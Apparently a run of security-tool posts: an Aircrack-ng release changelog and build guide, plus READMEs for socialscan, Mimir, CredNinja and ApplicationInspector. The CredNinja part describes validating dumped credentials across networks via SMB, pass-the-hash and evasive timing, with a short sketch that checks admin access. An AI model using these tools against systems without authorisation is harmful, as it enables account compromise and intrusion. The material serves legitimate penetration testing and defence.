In case you find security issues in Aircrack-ng or our domains, we recently added a security policy to explain how to report them. It is on GitHub, on our website, as well as security.txt.

And finally, what you've been waiting for, the full changelog:
  • Aircrack-ng: Added support for MidnightBSD
  • Aircrack-ng: Fixed ARM processors display with -u
  • Aircrack-ng: Fixed AVX-512F support
  • Aircrack-ng: Fixed cracking speed calculation
  • Aircrack-ng: Fixed cracking WEP beyond 10k IVS
  • Aircrack-ng: Fixed creating new session and added test case
  • Aircrack-ng: Fixed encryption display in some cases when prompting for network to crack
  • Aircrack-ng: Fixed exiting Aircrack-ng in some cases
  • Aircrack-ng: Fixed logical and physical processor count detection
  • Aircrack-ng: Fixed PMKID length check
  • Aircrack-ng: Various fixes and improvements to WPA cracking engine and its performance
  • Airdecap-ng: Decrypt both directions when WDS is in use
  • Airdecap-ng: Fixed decrypting WPA PCAP when BSSID changes
  • Airgraph-ng: Added support for WPA3
  • Airgraph-ng: Switch to argparse
  • Airmon-ng: Added detection for wicd, Intel Wireless Daemon (iwd), net_applet
  • Airmon-ng: Handle case when avahi keeps getting restarted
  • Airmon-ng: Indicates when interface doesn't exist
  • Airodump-ng: Added autocolorization interactive key
  • Airodump-ng: Added option to read PCAP in realtime (-T)
  • Airodump-ng: Added PMKID detection
  • Airodump-ng: Added support for GMAC
  • Airodump-ng: Added support for WPA3 and OWE (Enhanced Open)
  • Airodump-ng: Basic UTF-8 support
  • Airodump-ng: Checked management frames are complete before processing IE to avoid switch from WEP to WPA
  • Airodump-ng: Display signal when reading from PCAP
  • Airodump-ng: Fixed netxml output with hidden SSID
  • Airodump-ng: Improved rates calculation for 802.11n/ac
  • Airtun-ng: Fixed using -p with -e
  • Autoconf: Fixed order of ssl and crypto libraries
  • dcrack: Fixed client reporting benchmark
  • dcrack: Now handles chunked encoding when communicating (default in Python3)
  • Freeradius-WPE: Updated patch for v3.0.20
  • General: Added NetBSD endianness support
  • General: Added python3 support to scripts
  • General: Added script to update autotools on CentOS 7
  • General: Added security policy to report security issues
  • General: Reorganizing filesystem layout (See PR 2032), and switch to automake 1.14+
  • General: Convert to non-recursive make (part of PR 2032)
  • General: Deduplicating functions and code cleanups
  • General: Fixed packaging on cygwin due to openssl library name change
  • General: Fixed SPARC build on Solaris 11
  • General: Removed coveralls.io
  • General: Updated dependencies in README.md/INSTALLING
  • General: Use upstream radiotap library, as a sub-tree
  • General: various fixes and improvements (code, CI, integration tests, coverity)
  • HostAPd-WPE: Updated for v2.9
  • Manpages: Fixes and improvements
  • Tests: Added Integration tests for aireplay-ng, airodump-ng, aircrack-ng, airbase-ng, and others
  • Tests: Added tests for airdecap-ng, aircrack-ng

Building

Requirements
  • Autoconf
  • Automake
  • Libtool
  • shtool
  • OpenSSL development package or libgcrypt development package.
  • Airmon-ng (Linux) requires ethtool.
  • On windows, cygwin has to be used and it also requires w32api package.
  • On Windows, if using clang, libiconv and libiconv-devel
  • Linux: LibNetlink 1 or 3. It can be disabled by passing --disable-libnl to configure.
  • pkg-config (pkgconf on FreeBSD)
  • FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
  • Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)

Optional stuff
  • If you want SSID filtering with regular expressions in airodump-ng (--essid-regex), the PCRE development package is required.
  • If you want to use airolib-ng and the '-r' option in aircrack-ng, the SQLite development package >= 3.3.17 is required (3.6.X or better recommended)
  • If you want to use Airpcap, the 'developer' directory from the CD/ISO/SDK is required.
  • In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng, the libpcap development package is required (on Cygwin, use the Airpcap SDK instead; see above)
  • For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
  • rfkill
  • If you want Airodump-ng to log GPS coordinates, gpsd is needed
  • For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, as it may give a serious speed boost
  • CMocka for unit testing
  • For integration testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

Installing required and optional dependencies
Below are instructions for installing the basic requirements to build aircrack-ng for a number of operating systems.
Note: CMocka, tcpdump, screen, HostAPd and WPA Supplicant should not be dependencies when packaging Aircrack-ng.

Linux

Debian/Ubuntu
sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

Fedora/CentOS/RHEL
sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c++ ethtool hwloc-devel libcmocka-devel git make file expect hostapd wpa_supplicant iw usbutils tcpdump screen
Note: on CentOS and RedHat, HostAPd requires 'epel' repository to be enabled: sudo yum install epel-release

openSUSE
sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc

Mageia
sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c++ gcc make

Alpine
sudo apk add gcc g++ make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev

BSD

FreeBSD
pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

DragonflyBSD
pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

OpenBSD
pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

OSX
XCode, Xcode command line tools and HomeBrew are required.
brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

Windows

Cygwin
Cygwin requires the full path to the setup.exe utility, in order to automate the installation of the necessary packages. In addition, it requires the location of your installation, a path to the cached packages download location, and a mirror URL.
An example of automatically installing all the dependencies is as follows:
c:\cygwin\setup-x86.exe -qnNdO -R C:/cygwin -s http://cygwin.mirror.constant.com -l C:/cygwin/var/cache/setup -P autoconf -P automake -P bison -P gcc-core -P gcc-g++ -P mingw-runtime -P mingw-binutils -P mingw-gcc-core -P mingw-gcc-g++ -P mingw-pthreads -P mingw-w32api -P libtool -P make -P python -P gettext-devel -P gettext -P intltool -P libiconv -P pkg-config -P git -P wget -P curl -P libpcre-devel -P libssl-devel -P libsqlite3-devel

MSYS2
pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

Compiling
To build aircrack-ng, the Autotools build system is utilized. Autotools replaces the older method of compilation.
NOTE: If utilizing a developer version, eg: one checked out from source control, you will need to run a pre-configure script. The script to use is one of the following: autoreconf -i or env NOCONFIGURE=1 ./autogen.sh.
First, ./configure the project for building with the appropriate options specified for your environment:
./configure <options>
TIP: If the above fails, please see above about developer source control versions.
Next, compile the project (respecting if make or gmake is needed):
  • Compilation:
    make
  • Compilation on *BSD or Solaris:
    gmake
Finally, the additional targets listed below may be of use in your environment:
  • Execute all unit testing:
    make check
  • Execute all integration testing (requires root):
    make integration
  • Installing:
    make install
  • Uninstall:
    make uninstall

./configure flags
When configuring, the following flags can be used and combined to adjust the suite to your choosing:
  • with-airpcap=DIR: needed for supporting Airpcap devices on Windows (Cygwin or MSYS2 only). Replace DIR above with the absolute location of the root of the extracted source code from the Airpcap CD or the downloaded SDK available online. Required on Windows to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng when building experimental tools. The developer pack (compatible with versions 4.1.1 and 4.1.3) can be downloaded at https://support.riverbed.com/content/support/software/steelcentral-npm/airpcap.html
  • with-experimental: needed to compile tkiptun-ng, easside-ng, buddy-ng, buddy-ng-crawler, airventriloquist and wesside-ng. libpcap development package is also required to compile most of the tools. If not present, not all experimental tools will be built. On Cygwin, libpcap is not present and the Airpcap SDK replaces it. See --with-airpcap option above.
  • with-ext-scripts: needed to build airoscript-ng, versuck-ng, airgraph-ng and airdrop-ng. Note: Each script has its own dependencies.
  • with-gcrypt: Use the libgcrypt crypto library instead of the default OpenSSL, and also use the internal fast SHA-1 implementation (borrowed from GIT). Dependency (Debian): libgcrypt20-dev
  • with-duma: Compile with DUMA support. DUMA is a library to detect buffer overruns and under-runs. Dependencies (debian): duma
  • disable-libnl: Set-up the project to be compiled without libnl (1 or 3). Linux option only.
  • without-opt: Do not enable stack protector (on GCC 4.9 and above).
  • enable-shared: Make OSdep a shared library.
  • disable-shared: When combined with enable-static, it will statically compile Aircrack-ng.
  • with-avx512: On x86, add support for AVX512 instructions in aircrack-ng. Only use it when the current CPU supports AVX512.
  • with-static-simd=: Compile a single optimization in aircrack-ng binary. Useful when compiling statically and/or for space-constrained devices. Valid SIMD options: x86-sse2, x86-avx, x86-avx2, x86-avx512, ppc-altivec, ppc-power8, arm-neon, arm-asimd. Must be used with --enable-static --disable-shared. When using those 2 options, the default is to compile the generic optimization in the binary. --with-static-simd merely allows to choose another one.

Examples:
  • Configure and compiling:
    ./configure --with-experimental
    make
  • Compiling with gcrypt:
    ./configure --with-gcrypt
    make
  • Installing:
    make install
  • Installing (strip binaries):
    make install-strip
  • Installing, with external scripts:
    ./configure --with-experimental --with-ext-scripts
    make
    make install
  • Testing (with sqlite, experimental and pcre)
    ./configure --with-experimental
    make
    make check
  • Compiling on OS X with macports (and all options):
    ./configure --with-experimental
    gmake
  • Compiling on OS X 10.10 with XCode 7.1 and Homebrew:
    env CC=gcc-4.9 CXX=g++-4.9 ./configure
    make
    make check
    NOTE: Older XCode ships with a version of LLVM that does not support CPU feature detection, which causes ./configure to fail. To work around this older LLVM, a different compiler suite must be used, such as GCC or a newer LLVM from Homebrew.
    If you wish to use OpenSSL from Homebrew, you may need to specify the location of its installation. To figure out where OpenSSL lives, run:
    brew --prefix openssl
    Use the output above as the DIR for --with-openssl=DIR in the ./configure line:
    env CC=gcc-4.9 CXX=g++-4.9 ./configure --with-openssl=DIR
    make
    make check
  • Compiling on FreeBSD with gcc9
    env CC=gcc9 CXX=g++9 MAKE=gmake ./configure
    gmake
  • Compiling on Cygwin with Airpcap (assuming Airpcap devpack is unpacked in Aircrack-ng directory)
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-osdep
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-crypto
    cp -vfp Airpcap_Devpack/bin/x86/airpcap.dll src/aircrack-util
    dlltool -D Airpcap_Devpack/bin/x86/airpcap.dll -d build/airpcap.dll.def -l Airpcap_Devpack/bin/x86/libairpcap.dll.a
    autoreconf -i
    ./configure --with-experimental --with-airpcap=$(pwd)
    make
  • Compiling on DragonflyBSD with gcrypt using GCC 8
    autoreconf -i
    env CC=gcc8 CXX=g++8 MAKE=gmake ./configure --with-experimental --with-gcrypt
    gmake
  • Compiling on OpenBSD (with autoconf 2.69 and automake 1.16)
    export AUTOCONF_VERSION=2.69
    export AUTOMAKE_VERSION=1.16
    autoreconf -i
    env MAKE=gmake ./configure
    gmake
  • Compiling and debugging aircrack-ng
    export CFLAGS='-O0 -g'
    export CXXFLAGS='-O0 -g'
    ./configure
    make
    LD_LIBRARY_PATH=.libs gdb --args ./aircrack-ng [PARAMETERS]

Packaging
Automatic detection of CPU optimization is done at run time. This behavior is desirable when packaging Aircrack-ng (for a Linux or other distribution).
Also, in some cases it may be desirable to provide your own flags completely and not have the suite auto-detect a number of optimizations. To do this, add the flag --without-opt to the ./configure line:
./configure --without-opt

Using precompiled binaries

Linux/BSD
  • Use your package manager to download aircrack-ng.
  • In most cases, it will be an old version.

Windows
  • Install the appropriate "monitor" driver for your card (standard drivers doesn't work for capturing data).
  • aircrack-ng suite is command line tools. So, you have to open a commandline Start menu -> Run... -> cmd.exe then use them
  • Run the executables without any parameters to have help

Documentation
Documentation, tutorials, ... can be found at https://aircrack-ng.org
See also the manpages and the forum.
For further information, check the README file


Socialscan - Check Email Address And Username Availability On Online Platforms With 100% Accuracy


socialscan offers accurate and fast checks for email address and username usage on online platforms.
Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms.
Features that differentiate socialscan from similar tools (e.g. knowem.com, Namechk, and Sherlock):
  1. 100% accuracy: socialscan's query method eliminates the false positives and negatives that often occur in similar tools, ensuring that results are always accurate.
  2. Speed: socialscan uses asyncio along with aiohttp to conduct all queries concurrently, providing fast searches even with bulk queries involving hundreds of usernames and email addresses. On a test computer with average specs and Internet speed, 100 queries were executed in ~4 seconds.
  3. Library / CLI: socialscan can be executed through a CLI, or imported as a Python library to be used with existing code.
  4. Email support: socialscan supports queries for both email addresses and usernames.

The following platforms are currently supported:
  • Both username and email: Instagram, Twitter, GitHub, Tumblr, Lastfm
  • Username or email (one of the two): Snapchat, GitLab, Reddit, Yahoo, Pinterest, Spotify



Background
Other similar tools check username availability by requesting the profile page of the username in question and based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases:
  • Reserved keywords: Most platforms have a set of keywords that they don't allow to be used in usernames
    (A simple test: try checking reserved words like 'admin' or 'home' or 'root' and see if other services mark them as available)
  • Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist
Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses.
socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies.
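To make the failure mode concrete, the naive profile-page check described above boils down to something like the following sketch (the URL pattern is a hypothetical placeholder, not any real platform's endpoint):

# Sketch of the naive profile-page check that socialscan deliberately avoids.
# Assumption: the requests library is installed; example.com is a placeholder.
import requests

def naive_username_available(username):
    # Treat a 404 on the profile page as "available". This is exactly what
    # breaks for reserved keywords and deleted/banned accounts, which often
    # return 404 even though the name can never be registered.
    resp = requests.get("https://example.com/" + username, timeout=10)
    return resp.status_code == 404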

Installation

pip
> pip install socialscan

Install from source
> git clone https://github.com/iojw/socialscan.git  
> cd socialscan
> pip install .

Usage
usage: socialscan [list of usernames/email addresses to check]

optional arguments:
-h, --help show this help message and exit
--platforms [platform [platform ...]], -p [platform [platform ...]]
list of platforms to query (default: all platforms)
--view-by {platform,query}
view results sorted by platform or by query (default:
query)
--available-only, -a only print usernames/email addresses that are
available and not in use
--cache-tokens, -c cache tokens for platforms requiring more than one
HTTP request (Snapchat, GitHub, Instagram. Lastfm &
Tumblr), reducing total number of requests sent
--input input.txt, -i input.txt
file containg list of queries to execute
--proxy-list proxy_list.txt
file containing list of HTTP proxy servers to execute
queries with
--verbose, -v show query responses as they are received
--version show program's version number and exit

As a library
socialscan can also be imported into existing code and used as a library.
v1.0.0 introduces the async method execute_queries and the corresponding synchronous wrapper sync_execute_queries, which take a list of queries plus optional lists of platforms and proxies and execute all queries concurrently, returning a list of results in the same order.
from socialscan.util import Platforms, sync_execute_queries

queries = ["username1", "email2@gmail.com", "mail42@me.com"]
platforms = [Platforms.GITHUB, Platforms.LASTFM]
results = sync_execute_queries(queries, platforms)
for result in results:
print(f"{result.query} on {result.platform}: {result.message} (Success: {result.success}, Valid: {result.valid}, Available: {result.available})")
Output:
username1 on GitHub: Username is already taken (Success: True, Valid: True, Available: False)
username1 on Lastfm: Sorry, this username isn't available. (Success: True, Valid: True, Available: False)
email2@gmail.com on GitHub: Available (Success: True, Valid: True, Available: True)
email2@gmail.com on Lastfm: Sorry, that email address is already registered to another account. (Success: True, Valid: True, Available: False)
mail42@me.com on GitHub: Available (Success: True, Valid: True, Available: True)
mail42@me.com on Lastfm: Looking good! (Success: True, Valid: True, Available: True)

Text file input
For bulk queries with the --input option, place one username/email on each line in the .txt file:
username1
email2@mail.com
username3


Mimir - Smart OSINT Collection Of Common IOC Types


Smart OSINT collection of common IOC types.

Overview
This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.
The project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to give you knowledge about IOCs plus some added "wisdom" by calculating a risk score per IOC, assigning a common malware family name to hash lookups based on reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine whether an IP, URL, or domain is likely to be malicious.

Base Collection
For network based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS

Collection Sources
Some of these sources require an API key, and occasionally a paid account. I've tried to limit reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks

Risk Scoring
The risk scoring works best when Mimir can gather a decent number of data points for an IOC: passive DNS, well-populated URL/domain results (communicating samples, associated samples, recent scan data, etc.). It also takes the ML maliciousness prediction into account.
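Mimir does not publish an exact formula, but the idea can be sketched as a weighted sum over those data points plus the ML prediction; all field names and weights below are hypothetical, for illustration only:

# Hedged sketch of an IOC risk score in the spirit described above.
# Field names and weights are illustrative, not Mimir's actual scoring.
def risk_score(ioc):
    score = 0.0
    score += 2.0 * min(len(ioc.get("passive_dns", [])), 10)
    score += 1.5 * min(len(ioc.get("communicating_samples", [])), 10)
    score += 1.5 * min(len(ioc.get("associated_samples", [])), 10)
    if ioc.get("recent_scan_detections", 0) > 0:
        score += 15.0
    # ML prediction assumed to be a probability between 0 and 1
    score += 30.0 * ioc.get("ml_malicious_probability", 0.0)
    return min(score, 100.0)  # clamp to a 0-100 scale

print(risk_score({"passive_dns": ["ns1", "ns2"], "ml_malicious_probability": 0.9}))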

Machine Learning Predictions
The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output
Mimir offers results output in various options including local file reports or exporting the results to an external service.
  • stdout (console output)
    • normalizes result data, printed with headers and subheaders per module
  • JSON file
    • beautified output to local file
  • Excel
    • uses multiple sheets per IOC type
  • MISP
    • commit new indicators
  • ThreatConnect
    • commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)


CredNinja - A Multithreaded Tool Designed To Identify If Credentials Are Valid, Invalid, Or Local Admin Valid Credentials Within A Network At-Scale Via SMB, Plus Now With A User Hunter


This tool is intended for penetration testers who want to perform an engagement quickly and efficiently. While this tool can be used for more covert operations (including some additions below), it really shines when used at the scale of a large network.

At the core of it, you provide it a list of credentials you have dumped (or hashes, it can pass-the-hash) and a list of systems on the domain (I suggest scanning for port 445 first, or you can use "--scan"). It will tell you if the credentials you dumped are valid on the domain, and if you have local administrator access to a host.
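As the usage text below notes, the validity/local-admin check works by attempting to browse C$ over SMB with each credential pair. A rough sketch of that idea using the impacket library (an illustration of the concept, not CredNinja's actual implementation; host and credentials are examples):

# Hedged sketch of checking local admin access by browsing C$ over SMB.
# Assumption: impacket is installed (pip install impacket).
from impacket.smbconnection import SMBConnection

def has_local_admin(host, domain, username, password):
    try:
        conn = SMBConnection(host, host, sess_port=445, timeout=15)
        conn.login(username, password, domain)
        conn.listPath("C$", "*")  # only local administrators can browse C$
        return True
    except Exception:
        return False

print(has_local_admin("10.0.0.5", "CORP", "alice", "Password1!"))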

See below for additional features, like user hunting and host detail enumeration.

It is intended to be run on Kali Linux



.d8888b. 888 888b 888 d8b d8b
d88P Y88b 888 8888b 888 Y8P Y8P
888 888 888 88888b 888
888 888d888 .d88b. .d88888 888Y88b 888 888 88888b. 8888 8888b.
888 888P" d8P Y8b d88" 888 888 Y88b888 888 888 "88b "888 "88b
888 888 888 88888888 888 888 888 Y88888 888 888 888 888 .d888888
Y88b d88P 888 Y8b. Y88b 888 888 Y8888 888 888 888 888 888 888
"Y8888P" 888 "Y8888 "Y88888 888 Y888 888 888 888 888 "Y888888
888
d88P
888P"

v2.3 (Built 1/26/2018) - Chris King (@raikiasec)

For help: ./CredNinja.py -h

usage: CredNinja.py -a accounts_to_test.txt -s systems_to_test.txt
[-t THREADS] [--ntlm] [--valid] [--invalid] [-o OUTPUT]
[-p PASSDELIMITER] [--delay SECONDS %JITTER]
[--timeout TIMEOUT] [--stripe] [--scan]
[--scan-timeout SCAN_TIMEOUT] [-h] [--no-color] [--os]
[--domain] [--users] [--users-time USERS_TIME]

Quickly check the validity of multiple user credentials across multiple
servers and be notified if that user has local administrator rights on each
server.

Required Arguments:
-a accounts_to_test.txt, --accounts accounts_to_test.txt
A word or file of user credentials to test. Usernames
are accepted in the form of "DOMAIN\USERNAME:PASSWORD"
-s systems_to_test.txt, --servers systems_to_test.txt
A word or file of servers to test against. This can
be a single system, a filename containing a list of
systems, a gnmap file, or IP addresses in cidr notation.
Each credential will be tested against each of these
servers by attempting to browse C$ via SMB

Optional Arguments:
-t THREADS, --threads THREADS
Number of threads to use. Defaults to 10
--ntlm Treat the passwords as NTLM hashes and attempt to
pass-the-hash!
--valid Only print valid/local admin credentials
--invalid Only print invalid credentials
-o OUTPUT, --output OUTPUT
Print results to a file
-p PASSDELIMITER, --passdelimiter PASSDELIMITER
Change the delimiter between the account username and
password. Defaults to ":"
--delay SECONDS %JITTER
Delay each request per thread by specified seconds
with jitter (example: --delay 20 10, 20 second delay
with 10% jitter)
--timeout TIMEOUT Amount of seconds wait for data before timing out.
Default is 15 seconds
--stripe Only test one credential on one host to avoid spamming
a single system with multiple login attempts (used to
check validity of credentials). This will randomly
select hosts from the provided host file.
--scan Perform a quick check to see port 445 is available on
the host before queueing it up to be processed
--scan-timeout SCAN_TIMEOUT
Sets the timeout for the scan specified by --scan
argument. Default of 2 seconds
-h, --help Get help about this script's usage
--no-color Turns off output color. Written file is always
colorless

Additional Information Retrieval:
--os Display the OS of the system if available (no extra
request is being sent)
--domain Display the primary domain of the system if available
(no extra request is being sent)
--users List the users that have logged in to the system in
the last 6 months (requires LOCAL ADMIN). Returns
usernames with the number of days since their home
directory was changed. This sends one extra request to
each host
--users-time USERS_TIME
Modifies --users to search for users that have logged
in within the last supplied amount of days (default
100 days)


Changelog:

v2.3 - Updated with some additional features
  • Added gnmap file parsing.  The file provided to the --systems (-s) argument can now be a gnmap file (ending in .gnmap)
  • Added cidr notation parsing. The IP address provided to the --systems (-s)  argument can now be in cidr notation and it will properly expand the range and test all systems within the ip space (make sure you provide --scan to  scan the systems ahead of time!)
  • Made --scan multithreaded so it runs MUCH faster

v2.0 - Initial release of CredNinja from the predecessor CredSwissArmy:
  • Same ability as the previous CredSwissArmy (using credentials and host list to search for Local Admin access across a network via SMB)
  • Fully multithreaded!  It is 8x the speed of the old CredSwissArmy!
  • Handles errors and complex passwords much better
  • Can still pass-the-hash with the "--ntlm" option
  • Still has the same arguments as before
  • Added "--timeout", which allows scans to get done faster if you wish
  • Added "--scan", which runs a quick port 445 scan of the hosts to make sure they are connectable before trying creds on them
  • Added "--stripe", which tests each credential once across a random system  (used to validate credentials without appearing suspicious in one systems' event log)
  • Added "--delay", which allows you to specify a delay between scanning hosts  to be more covert.  "--delay 10 20" will delay for 10 seconds with a 20% jitter (so between 8-10 seconds)
  • Added color output so its more obvious when you get success!
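The "--delay SECONDS %JITTER" arithmetic above can be made concrete with a short sketch (an illustration of the documented behaviour, not CredNinja's code):

# "--delay 10 20" means: sleep roughly 10 seconds, minus up to 20% jitter,
# i.e. somewhere between 8 and 10 seconds per request.
import random
import time

def jittered_delay(seconds, jitter_percent):
    low = seconds * (1 - jitter_percent / 100.0)
    return random.uniform(low, seconds)

time.sleep(jittered_delay(10, 20))  # sleeps between 8 and 10 seconds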

AND NOW THE COOL ADDITIONS

Added "--os", which shows the operating system of each system that it can fingerprint (no additional packet is sent to target host)
Added "--domain", which shows the primary domain the system is a member of (no additional packet is sent to the target host)
Added "--users", which shows a list of users' whose home directories have been modified in X amount of days (X is modifiable by "--users-days", default of 100). Basically an SMB User-Hunter that shows where users are logged in to or have been logged in to  (1 additional packet is sent to each target host)
Coming soon: Anti-virus detector to give notice to potential antivirus running on the system


ApplicationInspector - A Source Code Analyzer Built For Surfacing Features Of Interest And Other Characteristics To Answer The Question 'What's In It' Using Static Analysis With A JSON Based Rules Engine

Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does.
Application Inspector is different from traditional static analysis tools in that it doesn't attempt to identify "good" or "bad" patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection, including features that impact security such as the use of cryptography. This can be extremely helpful in reducing the time needed to determine what open source or other components do by examining the source directly, rather than trusting limited documentation or recommendations.
The tool includes several output formats with the default being an html report similar to the one shown here.


It includes a filterable confidence indicator to help minimize false positive matches, as well as customizable default rules and conditional match logic.
Be sure to see our project wiki page (https://Github.com/Microsoft/ApplicationInspector/wiki) for illustrations, additional information, and help.

Goals
Application Inspector helps you choose the best components to meet your needs with a smaller footprint of unknowns, keeping your application attack surface smaller. It helps you avoid including components with unexpected features you don't want.
Application Inspector can help identify feature deltas or changes between component versions, which can be critical for detecting injection of backdoors.
It can be used to automate detection of features of interest, to identify components that require additional scrutiny as part of your build pipeline, or to create a repository of metadata regarding all of your enterprise applications.
Basically, we created Application Inspector to help us identify risky third party software components based on their specific features, but the tool is helpful in many non-security contexts as well.
Application Inspector v1.0 is now in GENERAL AUDIENCE release status. Your feedback is important to us. If you're interested in contributing, please review the CONTRIBUTING.md.

Contribute
We have a strong default starting base of Rules for feature detection. But there are many feature identification patterns yet to be defined and we invite you to submit ideas on what you want to see or take a crack at defining a few. This is a chance to literally impact the open source ecosystem helping provide a tool that everyone can use. See the Rules section of the wiki for more.

Getting Application Inspector
To use Application Inspector, download the relevant binary (either platform-specific or the multi-platform .NET Core release). If you use the .NET Core version, you will need to have .NET Core 3.0 or later installed.
It might be valuable to consult the project wiki for additional background on Rules, Tags and more used to identify features. Tags are used as a systematic hierarchical nomenclature, e.g. Cryptography.Protocol.TLS, to more easily represent features.

Usage
Application Inspector is a command-line tool. Run it from a command line in Windows, Linux, or MacOS.
> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>

Microsoft Application Inspector 1.0.17
ApplicationInspector 1.0.17

(c) Microsoft Corporation. All rights reserved

ERROR(S):
No verb selected.

analyze Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
tagdiff Compares unique tag values between two source paths
tagtest Test presence of smaller set or custom tags in source (compare or verify modes)
exporttags Export default unique rule tags to view what features may be detected
verifyrules Verify rules syntax is valid
help Display more information on a specific command
version Display version information

Examples:

Command Help
  Usage: dotnet AppInspector.dll [arguments] [options]

dotnet AppInspector.dll -description of available commands
dotnet AppInspector.dll <command> -options description for a given command

Analyze Command
  Usage: dotnet AppInspector.dll analyze [arguments] [options]

Arguments:
-s, --source-path Required. Path to source code to inspect (required)
-o, --output-file-path Path to output file. Ignored with -f html option which auto creates output.html
-f, --output-file-format (Default: html) Output format [html|json|text]
-e, --text-format (Default: Tag:%T,Rule:%N,Ruleid:%R,Confidence:%X,File:%F,Sourcetype:%t,Line:%L,Sample:%m)
-r, --custom-rules-path Custom rules path
-t, --tag-output-only (Default: false) Output only contains identified tags
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-d, --allow-dup-tags (Default: false) Output only contains non-unique tag matches
-c, --confidence-filters (Default: high,medium) Output only if matches rule pattern confidence [<value>,] [high|medium|low]
-k, --include-sample-paths (Default: false) Include source files with (sample,example,test,.vs,.git) in pathname in analysis
-x, --console-verbosity (Default: medium) Console verbosity [high|medium|low|none]
-l, --log-file-path Log file path
-v, --log-file-level (Default: Error) Log file level [Debug|Info|Warn|Error|Fatal|Off]

Scan a project directory, with output sent to "output.html" (default behavior includes launching default browser to this file)
  dotnet AppInspector.dll analyze -s /home/user/myproject 

Add custom rules (can be specified multiple times)
  dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules

Write to JSON format
  dotnet AppInspector.dll analyze -s /home/user/myproject -f json

Tagdiff Command
Use to analyze and report on differences in tags (features) between two project or project versions e.g. v1, v2 to see what changed
  Usage: dotnet AppInspector.dll tagdiff [arguments] [options]

Arguments:
--src1 Required. Source 1 to compare (required)
--src2 Required. Source 2 to compare (required
-t, --test-type (Default: equality) Type of test to run [equality|inequality]
-r, --custom-rules-path Custom rules path
-i, --ignore-default-rules (Default: false) Ignore default rules bundled with application
-o, --output-file-path Path to output file
-x, --console-verbosity Console verbosity [high|medium|low
-l, --log-file-path Log file path
-v, --log-file-level Log file level [error|trace|debug|info]

Simplest way to see the delta in tag features between two projects
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2

Basic use
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality

Basic use
  dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality

TagTest Command
Used to verify (pass/fail) that a specified set of rule tags is present or not present in a project, e.g. the user only wants to know true/false whether cryptography is present as expected, or whether personal data is not present as expected, and get a simple yes/no result rather than a full analysis report.
Note: The user is expected to use the custom-rules-path option rather than the default ruleset, because it is unlikely that any source package would contain all of the default rules. Instead, create a custom path and rule set as needed, or use custom-rules-path to point only to the rule(s) needed from the default set.
Otherwise, testing for all default rules present in source will likely yield a false or fail result in most cases.
  Usage: dotnet AppInspector.dll tagtest [arguments] [options

Arguments:
-s, --source-path Required. Source to test (required)
-t, --test-type (Default: rulespresent) Test to perform [rulespresent|rulesnotpresent]
